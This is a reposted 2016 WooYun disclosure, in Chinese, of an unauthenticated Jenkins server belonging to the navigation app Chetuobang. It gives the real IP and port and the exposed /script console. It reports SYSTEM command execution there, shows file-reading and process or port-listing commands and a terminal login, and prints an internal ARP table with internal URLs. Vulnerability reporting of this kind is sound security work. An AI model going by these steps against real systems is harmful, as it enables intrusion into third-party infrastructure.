车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

admin
admin
admin
140488
文章
117
评论
2017年4月1日11:32:31评论511 views字数 226阅读0分45秒阅读模式
摘要

2016-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-08: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2016-188552

漏洞标题: 车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

相关厂商: 车托帮

漏洞作者: 路人甲

提交时间: 2016-03-24 14:16

公开时间: 2016-05-08 14:16

漏洞类型: 命令执行

危害等级: 高

自评Rank: 15

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行 未授权访问

1人收藏

漏洞详情

披露状态:

2016-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

mask 区域 
*****ang.*****
 *****最实时的路况、导航等信*****
 **********
 *****题*****
 1.http://**.**.**/_
 **********
 *****ns *****
 **********
 *****dcda3a845681706285bb.png&qu*****
 **********
 2.http://**.**.**/job/ctbTest/ws/shiyi/shiyiTest.java/*view*/_
 **********
 *****strResult =*****
 *****tp://traffic.ch*****
 *****ttp://wxlk.chet*****
 *****p://wxlk-files.c*****
 *****
 *****
 *****quot;./logs/*****
 **********
 ***** = new *****
 *****ew AlarmSend(*****
 **********
 3.http://**.**.**/script_
 *****m*****
 *****5848a57615d9655054a9.png&qu*****
 **********
 *****strator//des*****
 *****内容……………*****
 *****d="lnk*****
 *****n()">view j*****
 *****ginal url:*****
 *****nd?">http://api-sms.*****
 *****er format*****
 *****g.com/msg/send?format=*****
 *****g.com/msg/send?format=*****
 *****g.com/msg/send?format=*****
 *****g.com/msg/send?format=*****
 *****;</*****
 **********
 *****tat找到*****
 **********
 *****956aecc35563526915e6.png&qu*****
 **********
 *****陆*****
 *****027c7486b67678859f28.png&qu*****
 **********
 **********
 ***** 10.132.41*****
 *****理地址   *****
 *****-3e-03-e2-ff   *****
 *****-0c-9f-f0-15   *****
 *****-d9-70-9b-c1   *****
 *****-d9-70-64-c1   *****
 *****-ff-ff-ff-ff   *****
 *****-5e-00-00-16   *****
 *****-5e-00-00-fc   *****
 *****-5e-4d-7c-d5   *****
 *****-5e-7f-ff-fa   *****
 **********
 *****.32.137 *****
 *****理地址   *****
 *****-0c-9f-f0-16   *****
 *****-d9-70-9b-c1   *****
 *****-d9-70-64-c1   *****
 *****-ff-ff-ff-ff   *****
 *****-5e-00-00-16   *****
 *****-5e-00-00-fb   *****
 *****-5e-00-00-fc   *****
 *****-5e-4d-7c-d5   *****
 *****-ff-fa     静态 *****
 **********
 *****已*****
 *****c380167dfb94bc0ba8b802.png*****

漏洞证明:

chetuobang.com

车托帮是国内首款社会化导航应用,为车主提供最好最准最实时的路况、导航等信息服务,1000万车主信赖的社交导航。

存在问题的url

http://121.199.32.137:8080/

jenkins

车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

http://121.199.32.137:8080/job/ctbTest/ws/shiyi/shiyiTest.java/*view*/

code 区域 
String strResult = "";
  String strBaseurl = "http://traffic.chetuobang.com/";
  String strBaseurl1 = "http://wxlk.chetuobang.com/";
  String strBaseurl2 = "http://wxlk-files.chetuobang.com/";
  
  String strFilename = "./logs/log.txt";
 
  tools Ctools = new tools();
  AlarmSend CalarmSend = new AlarmSend();

命令执行

http://121.199.32.137:8080/script

system权限

车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

type c://Users//Administrator//desktop//1.html

…………………………………部分内容………………………………………

code 区域 
<div id="lnks">
   <a href="javascript:showJson()">view json datasource</a>
   <b>from original url:</b>
   <a href="http://api-sms.chetuobang.com/msg/send?">http://api-sms.chetuobang.com/msg/send?</a>
   <b>in other formats:</b>
   <a href="http://api-sms.chetuobang.com/msg/send?format=json">json</a>
   <a href="http://api-sms.chetuobang.com/msg/send?format=xml">xml</a>
   <a href="http://api-sms.chetuobang.com/msg/send?format=csv">csv</a>
   <a href="http://api-sms.chetuobang.com/msg/send?format=jsv">jsv</a>
 </div>

tasklist 配合netstat找到远程端口

车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

成功登陆终端

车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

可探测内网

code 区域 
接口: 10.132.41.29 --- 0x12
   Internet 地址         物理地址              类型
   10.132.36.189         00-16-3e-03-e2-ff     动态        
   10.132.47.247         00-00-0c-9f-f0-15     动态        
   10.132.47.248         d8-67-d9-70-9b-c1     动态        
   10.132.47.249         d8-67-d9-70-64-c1     动态        
   10.132.47.255         ff-ff-ff-ff-ff-ff     静态        
   224.0.0.22            01-00-5e-00-00-16     静态        
   224.0.0.252           01-00-5e-00-00-fc     静态        
   239.77.124.213        01-00-5e-4d-7c-d5     静态        
   239.255.255.250       01-00-5e-7f-ff-fa     静态        
 
 接口: 121.199.32.137 --- 0x14
   Internet 地址         物理地址              类型
   121.199.35.247        00-00-0c-9f-f0-16     动态        
   121.199.35.248        d8-67-d9-70-9b-c1     动态        
   121.199.35.249        d8-67-d9-70-64-c1     动态        
   121.199.35.255        ff-ff-ff-ff-ff-ff     静态        
   224.0.0.22            01-00-5e-00-00-16     静态        
   224.0.0.251           01-00-5e-00-00-fb     静态        
   224.0.0.252           01-00-5e-00-00-fc     静态        
   239.77.124.213        01-00-5e-4d-7c-d5     静态        
   239.255.255.250       01-00-5e-7f-ff-fa     静态

测试账号已经删除

车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

修复方案:

验证

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin